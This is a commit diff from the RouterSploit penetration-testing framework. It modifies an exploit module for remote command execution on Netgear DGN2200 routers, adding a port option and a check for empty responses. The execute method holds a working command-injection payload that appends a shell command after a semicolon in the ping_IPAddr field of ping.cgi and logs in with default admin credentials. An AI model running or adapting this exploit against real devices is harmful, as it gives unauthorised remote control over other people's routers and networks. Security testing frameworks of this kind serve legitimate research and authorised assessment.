Adding port option, fixing execute method

91b8186b · lucyoa · 9ecf256f · 91b8186b
Commit 91b8186b authored Feb 23, 2017 by lucyoa
Hide whitespace changes
Inline Side-by-side

Showing with 7 additions and 1 deletions

dgn2200_ping_cgi_rce.py ...ersploit/modules/exploits/netgear/dgn2200_ping_cgi_rce.py +7 -1

No files found.
--- a/routersploit/modules/exploits/netgear/dgn2200_ping_cgi_rce.py
+++ b/routersploit/modules/exploits/netgear/dgn2200_ping_cgi_rce.py
@@ -35,6 +35,8 @@ class Exploit(exploits.Exploit):
    }

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target Port')  # target port
+
    login = exploits.Option('admin', 'Username')
    password = exploits.Option('password', 'Password')

@@ -50,11 +52,15 @@ class Exploit(exploits.Exploit):
            print_error("Target is not vulnerable")

    def execute(self, command):
-        url = "{}/ping.cgi".format(self.target)
+        url = "{}:{}/ping.cgi".format(self.target, self.port)
        data = {'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping': "Ping", 'ping_IPAddr': "12.12.12.12; " + command}
        referer = "{}/DIAG_diag.htm".format(self.target)
        headers = {'referer': referer}
+
        r = http_request(method="POST", url=url, data=data, auth=(self.login, self.password), headers=headers)
+        if r is None:
+            return ""
+
        result = self.parse_output(r.text)
        return result.encode('utf-8')